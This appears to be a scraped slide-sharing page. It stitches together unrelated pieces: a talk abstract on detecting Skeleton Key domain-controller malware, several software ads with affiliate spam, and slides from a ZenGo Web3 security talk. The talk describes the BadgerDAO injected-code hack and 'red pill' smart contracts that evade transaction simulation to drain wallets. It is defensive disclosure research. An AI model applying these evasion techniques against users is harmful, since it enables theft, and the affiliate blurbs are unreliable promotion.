Earlier this year, Dell Secureworks had shared a report on an advanced attack campaign utilizing a dedicated DC malware, named “Skeleton Key” Malware. The Skeleton Key malware modifies the DC behavior to accept authentications specifying a secret ”Skeleton key” (i.e. “master key”) password, thus enabling the attackers to login from any computer as any domain user without installing any additional malware while keeping the original users’ authentication behavior.
On this talk, we will explore the unique interaction between such malware functionality and the Kerberos authentication protocol; We will put a special emphasis on its manifestation over the network traffic. We will also share a script that implements the remotes detection of the skeleton key malware functionality.
The talk was given on TCE2015 summer school, Technion, Israel
In the ever-evolving landscape of technology, enterprise software development is undergoing a significant transformation. Traditional coding methods are being challenged by innovative no-code solutions, which promise to streamline and democratize the software development process.
This shift is particularly impactful for enterprises, which require robust, scalable, and efficient software to manage their operations. In this article, we will explore the various facets of enterprise software development with no-code solutions, examining their benefits, challenges, and the future potential they hold.
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Crescat
Crescat is industry-trusted event management software, built by event professionals for event professionals. Founded in 2017, we have three key products tailored for the live event industry.
Crescat Event for concert promoters and event agencies. Crescat Venue for music venues, conference centers, wedding venues, concert halls and more. And Crescat Festival for festivals, conferences and complex events.
With a wide range of popular features such as event scheduling, shift management, volunteer and crew coordination, artist booking and much more, Crescat is designed for customisation and ease-of-use.
Over 125,000 events have been planned in Crescat and with hundreds of customers of all shapes and sizes, from boutique event agencies through to international concert promoters, Crescat is rigged for success. What's more, we highly value feedback from our users and we are constantly improving our software with updates, new features and improvements.
If you plan events, run a venue or produce festivals and you're looking for ways to make your life easier, then we have a solution for you. Try our software for free or schedule a no-obligation demo with one of our product specialists today at crescat.io
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...Juraj Vysvader
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I didn't get rich from it but it did have 63K downloads (powered possible tens of thousands of websites).
Quarkus Hidden and Forbidden ExtensionsMax Andersen
Quarkus has a vast extension ecosystem and is known for its subsonic and subatomic feature set. Some of these features are not as well known, and some extensions are less talked about, but that does not make them less interesting - quite the opposite.
Come join this talk to see some tips and tricks for using Quarkus and some of the lesser known features, extensions and development techniques.
We describe the deployment and use of Globus Compute for remote computation. This content is aimed at researchers who wish to compute on remote resources using a unified programming interface, as well as system administrators who will deploy and operate Globus Compute services on their research computing infrastructure.
Zoom is a comprehensive platform designed to connect individuals and teams efficiently. With its user-friendly interface and powerful features, Zoom has become a go-to solution for virtual communication and collaboration. It offers a range of tools, including virtual meetings, team chat, VoIP phone systems, online whiteboards, and AI companions, to streamline workflows and enhance productivity.
Enterprise Resource Planning System includes various modules that reduce any business's workload. Additionally, it organizes the workflows, which drives towards enhancing productivity. Here are a detailed explanation of the ERP modules. Going through the points will help you understand how the software is changing the work dynamics.
To know more details here: https://blogs.nyggs.com/nyggs/enterprise-resource-planning-erp-system-modules/
Unleash Unlimited Potential with One-Time Purchase
BoxLang is more than just a language; it's a community. By choosing a Visionary License, you're not just investing in your success, you're actively contributing to the ongoing development and support of BoxLang.
Understanding Nidhi Software Pricing: A Quick Guide 🌟
Choosing the right software is vital for Nidhi companies to streamline operations. Our latest presentation covers Nidhi software pricing, key factors, costs, and negotiation tips.
📊 What You’ll Learn:
Key factors influencing Nidhi software price
Understanding the true cost beyond the initial price
Tips for negotiating the best deal
Affordable and customizable pricing options with Vector Nidhi Software
🔗 Learn more at: www.vectornidhisoftware.com/software-for-nidhi-company/
#NidhiSoftwarePrice #NidhiSoftware #VectorNidhi
Do you want Software for your Business? Visit Deuglo
Deuglo has top Software Developers in India. They are experts in software development and help design and create custom Software solutions.
Deuglo follows seven steps methods for delivering their services to their customers. They called it the Software development life cycle process (SDLC).
Requirement — Collecting the Requirements is the first Phase in the SSLC process.
Feasibility Study — after completing the requirement process they move to the design phase.
Design — in this phase, they start designing the software.
Coding — when designing is completed, the developers start coding for the software.
Testing — in this phase when the coding of the software is done the testing team will start testing.
Installation — after completion of testing, the application opens to the live server and launches!
Maintenance — after completing the software development, customers start using the software.
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisGlobus
JASMIN is the UK’s high-performance data analysis platform for environmental science, operated by STFC on behalf of the UK Natural Environment Research Council (NERC). In addition to its role in hosting the CEDA Archive (NERC’s long-term repository for climate, atmospheric science & Earth observation data in the UK), JASMIN provides a collaborative platform to a community of around 2,000 scientists in the UK and beyond, providing nearly 400 environmental science projects with working space, compute resources and tools to facilitate their work. High-performance data transfer into and out of JASMIN has always been a key feature, with many scientists bringing model outputs from supercomputers elsewhere in the UK, to analyse against observational or other model data in the CEDA Archive. A growing number of JASMIN users are now realising the benefits of using the Globus service to provide reliable and efficient data movement and other tasks in this and other contexts. Further use cases involve long-distance (intercontinental) transfers to and from JASMIN, and collecting results from a mobile atmospheric radar system, pushing data to JASMIN via a lightweight Globus deployment. We provide details of how Globus fits into our current infrastructure, our experience of the recent migration to GCSv5.4, and of our interest in developing use of the wider ecosystem of Globus services for the benefit of our user community.
May Marketo Masterclass, London MUG May 22 2024.pdfAdele Miller
Can't make Adobe Summit in Vegas? No sweat because the EMEA Marketo Engage Champions are coming to London to share their Summit sessions, insights and more!
This is a MUG with a twist you don't want to miss.
Navigating the Metaverse: A Journey into Virtual Evolution"Donna Lenk
Join us for an exploration of the Metaverse's evolution, where innovation meets imagination. Discover new dimensions of virtual events, engage with thought-provoking discussions, and witness the transformative power of digital realms."
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteGoogle
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
👉👉 Click Here To Get More Info 👇👇
https://sumonreview.com/ai-pilot-review/
AI Pilot Review: Key Features
✅Deploy AI expert bots in Any Niche With Just A Click
✅With one keyword, generate complete funnels, websites, landing pages, and more.
✅More than 85 AI features are included in the AI pilot.
✅No setup or configuration; use your voice (like Siri) to do whatever you want.
✅You Can Use AI Pilot To Create your version of AI Pilot And Charge People For It…
✅ZERO Manual Work With AI Pilot. Never write, Design, Or Code Again.
✅ZERO Limits On Features Or Usages
✅Use Our AI-powered Traffic To Get Hundreds Of Customers
✅No Complicated Setup: Get Up And Running In 2 Minutes
✅99.99% Up-Time Guaranteed
✅30 Days Money-Back Guarantee
✅ZERO Upfront Cost
See My Other Reviews Article:
(1) TubeTrivia AI Review: https://sumonreview.com/tubetrivia-ai-review
(2) SocioWave Review: https://sumonreview.com/sociowave-review
(3) AI Partner & Profit Review: https://sumonreview.com/ai-partner-profit-review
(4) AI Ebook Suite Review: https://sumonreview.com/ai-ebook-suite-review
7. Blockchain: In a nutshell
● “Just” a distributed database
○ Reaching a consensus on conflicts is not trivial!
● Messages are authenticated
○ User address corresponds to a public key
○ User signs messages with a private key
○ Private key stored in a wallet
● Very useful for value transfer = digital money!
● Bitcoin (2009) is doing that:
○ “1 built-in program”: “Send(source,dest,amount)”
■ Check authenticity by verifying the user’s signature on the transaction
■ Add amount to dest, subtract amount from source
■ Results are saved in the blockchain
9. Blockchain: beyond sending money
● Ethereum, co-founded by Vitalik (2015)
○ Has a similar “1 built-in program” for money transfer
○ But also, allows users to upload custom code (smart contract) and interact with it
■ Smart contracts are uploaded into addresses
■ Smart contracts expose callable methods
■ Very similar to a dynamic library (“.dll”, “.so”)
○ When interacting with a contract
■ Destination address is the contract
■ Function name and call parameters are passed as part of the transaction
■ Network fee (“gas”) depends on the complexity of the execution
11. Ethereum Apps: Tokens (ERC20)
● Before:
○ if you wanted your own coin, you needed to create your own blockchain
● After:
○ You just need to implement a smart contract that supports 6 methods (and 2 events)
12. Software eats world: DeFi “Money Lego”
● ERC20 is a standard, so dev developed standard services
○ Exchange in smart contract: DEX
○ Deposits / Loans
○ Derivatives
● Composability
○ Everything is just a function call
○ You can make an app to “mix and match”
■ Example “swap + deposit” app
● Finds the best interest rate for coin
● Switches user coin to it and deposits
13. Ethereum Apps: NFTs
● Current leading use case “Funny JPEGs”
● In future, also more serious use cases: registries, fractional ownership
● All you need to do is to implement 9 functions (and 3 events)
14. NFT in the wild
● The user owns NFTs
○ Ownership is public on blockchain
○ User can transfer via wallet
● Multiple marketplaces
○ For example: Opensea, rarible
17. How can user consume apps?
● (Most) Users cannot interact directly with smart contracts
○ We need to provide UI for this new system
○ We need to tell the wallet what to sign
● We already solved similar problems with Web
● Let’s repurpose Web2 to work with blockchain!
24. ZenGo 💕 Ethereum and Web3
● Ethereum supported since day 1
○ Polygon added
● ClearSign:
○ Web3 first firewall integrated into the wallet
● Native tokens support
○ ERC20
○ NFTs gallery
● Ethereum Foundation grant
● Security research
○ Including this talk! :)
27. Ethereum: The most(?) secure execution env!
● Trusted execution is a hard problem
○ Integrity of data and code
○ Consider malware, HW supply chain, Operating system supply chain
● Usually “solved” in hardware: SGX, TEE, etc.
● Ethereum
○ Code and inputs are on chain
○ Execution is independently validated by multiple validators
● In Ethereum an attacker will need to compromise the majority of validators
to compromise a computation!
● Implicit bug bounty of $200B
● More on this: zengo.com/wagmi-web3-will-be-more-secure-than-web2/
28. If it’s so good, how come it’s so bad?
● If Web3 is so secure, how come there are so many hacks and money loss
cases?
29. Answer: because humans make mistakes
● The program (code + input) is executed perfectly, but either code or input (or
both) is malicious!
30. Attack scenario #1: Malicious user
● The program (code + input) is executed perfectly, but
○ The smart contract’s code has vulns
○ Malicious user send maliciously crafted inputs to exploit
● Not going to discuss that today
31. Attack #2: Malicious web2 interface
● The program (code + input) is executed perfectly, but:
○ The input is bad for the user
■ Input is suggested by a malicious dapp
● Definitely going to discuss that today
32. Attack #3: Malicious code
● The program (code + input) is executed perfectly, but:
○ The code is malicious
● Definitely going to discuss that today
33. Malicious interfaces in the wild: BadgerDAO
● “Bringing Bitcoin to DeFi” : Earn interest on your BTC
○ via ERC20
34. BadgerDAO hack: injected code to web interface
● BadgerDao web interface infected with injected code
○ [Nov 2021] first version injected
○ Captured by web.archive.org
○ De-obfuscated by ZenGo
● Code Diff (The injected website is in red on left)
35. BadgerDAO Who is $50M fish?
● According to press
○ Celsius
○ Using MetaMask
36. BadgerDAO: IncreaseAllowance vs. Approve
● Usually ERC20 funds access request
with Approve()
● Attackers used a lesser known
method IncreaseAllowance()
● MM did not recognize
IncreaseAllowance()
○ No humanly understandable explanation
○ Not showing user that they are
interacting with an ERC20 contract
37. Malicious Smart Contracts in the wild
● The truth is this danger is fairly limited
● Bad contracts can only touch Ethereum
○ Smart contract based assets requires an approve before (as before)
● Ethereum sending is visible as
○ ‘Ethereum has a similar “1 built-in program” for money transfer’
● Still there could be scams like
○ Give $10 ETH to get $200 ERC-20
38. Is execution (code + input) malicious or benign?
● Visibility is the key:
● Users needs to know before they sign a transaction what would be the outcome of sending
this RPC parameters to the contract
● We can try to analyze the code
○ CS theory tells us this problem is undecidable
● However, antivirus has been dealing with this issue for decades
○ VM / sandbox / detonation chamber
● Instead of analyzing what the program does, let’s just execute it in a
sandboxes environment!
● and then apply some security logic on it.
40. Ethereum is a state machine
● EVM is the runtime environment for smart contract in Ethereum
41. EVM opcodes
● Predefined instructions
● Smart contract written in High level languages, broken down into EVM
codes
● Execution is initiated by a transaction
42. Special variables in the EVM
● Not part of the “regular state”, by definition
○ Some of them are controlled by the user
○ Some of them are “global” variables
● Runtime environment variables:
○ COINBASE - the Account which is going to get the current block fee rewards
○ GASPRICE - Transaction’s gas price
○ BASEFEE - EIP1559 block’s basefee
45. Are we ready to simulate? Not yet!
● The problem:
○ We can execute a smart contract and observe state changes, but how
can we explain them to the user?
○ State changes are hard to explain
● Solution:
○ Events to the rescue!
46. Ethereum events
● Invoked by smart contracts during execution
○ Generated on-chain
○ Not stored on-chain - can’t be consumed by smart contracts
● Frequently used by off-chain services
● Any contract can emit any event
● Can we trust events?
○ We can trust good Smart Contract events - as they intend to represent a real on-chain state
47. Common events in ERC20 and ERC721 (NFT’s)
● Approval event
○ Emitted every time the token owner allows another address to access their tokens
■ In ERC721 - ApprovalForAll - all the tokens within the collection
■ In ERC20 - Approve - specific amount of tokens
● Transfer events
○ Emitted every time a token is being transferred from an address to another
48. Simulation flow
1. Transaction is being simulated
○ Potential emitted events are shown to the user
2. Based on the events results the user decides whether to reject or continue
the transaction
3. Transaction is broadcasted to the blockchain
52. ● Find a red pill predicate
○ Am I in a simulation now?
● If in simulation
○ Show benign behavior
● If in non-simulation
○ Attack!
Red Pills exploit: A blueprint
simulation? non-simulation?
53. Red Pills in Cyber Security
● Traditional Red pills:
○ Malware Vaccination tricks:
■ VM detection
■ isDebuggerPresent
■ SandBox detection
● Web3 Security Red Pills:
○ Malicious smart contract:
■ Can it be aware it runs in simulation?
54. Web3 Red Pills hypothesis: Special variables
● In real environment naturally provided by:
○ The user - User specifies variables (i.e gaslimit)
○ The environment - i.e block base fee
● However in simulation:
○ Being generated by the simulation node provider
● Almost any value is technically valid, however not every value is
“reasonable”
● Maybe these are our Red Pills?
55. Validating the hypothesis
● To validate, we need to see the value of special variables in simulation
● Challenge: simulation products are black boxes
○ Just showing simulation results
● Solution: Using standard events in order to debug!
○ Transfer events are restricted to a specific signature
○ Byte by byte debugging
○ Solidity casting
56. Bingo!
● Applying the technique we were able:
○ Easily debug every environment variable of any provider
○ Search for unreasonable values
● Some unreasonable values found
○ COINBASE always the null address (0x000000…000)
○ GASPRICE always 0
○ GASLIMIT always a constant extremely high values
● Once we discover an unreasonable value provided by a simulation vendor
○ We can create a “red pill” predicate for it:
■ If simulation, then show a good trade
■ If non-simulation, just take the money
● And finally, deploy dedicated exploit contract for every vendor
57. Exploit example: COINBASE null address
● Red pill predicate
○ Is COINBASE == 0 ?
● Exploit
○ Tricks the user to sign a transaction using the simulation:
■ At simulation sends ERC20 token back
■ On chain it will not!
60. Bounties, Grants
● Bounties:
○ Coinbase wallet
○ Rabby wallet
● Grants:
○ from the Ethereum Foundation: https://zengo.com/ethereum-foundation-awards-
zengo-a-grant-for-web3-security-research/
61. How to fix
● Use the REAL environment variables from the current environment
○ That way a malicious contract can no longer differentiate
● Some of them should be provided by the user:
○ GASPRICE
○ GASLIMIT
● Some of them aren’t known yet:
○ COINBASE - Use the last block’s value (consecutive COINBASE value may appear on-chain)
62. Cat and Mouse - TOCTOU
● Simulating the transaction + confirming it takes time
● Malicious application can leverage it:
○ Dapp checks the timestamp when the tx was craftet
○ Contract checks time elapsed
● Red Pill predicate
○ Is blockDiff > X
65. Takeaways
● Web3 enables decentralized apps with thrilling use cases
● However, it creates new attack surfaces
○ Rogue contracts
○ Rogue interfaces
● Users have no visibility to what they are signing!
● You cannot fight what you cannot see
● Transaction simulation provides visibility
○ But has some limitations and can be attacked
■ Red Pills!
● Transaction simulation should be implemented securely
● With this new visibility, Web3 firewalls can save the users!
What is blockchain [20 mins]
Distributed database
Private key, public key, signing, address, transaction
MPC in a nutshell
Fees
Explorers
Ethereum [25 mins]
Ethereum vs. Bitcoin
Smart contracts and apps:
ERC20
NFTs
DeFi
Web3 and WalletConnect
Web3 security in a nutshell
Other chains [5 mins]
Honorable mentions for chains ZenGo supports / supported / will support: Tezos, Dogecoin, Terra, Binance, Solana
Layer 2
Team [5m]
Research team - areas of research: Blockchain, Security, Cryptography and MPC
people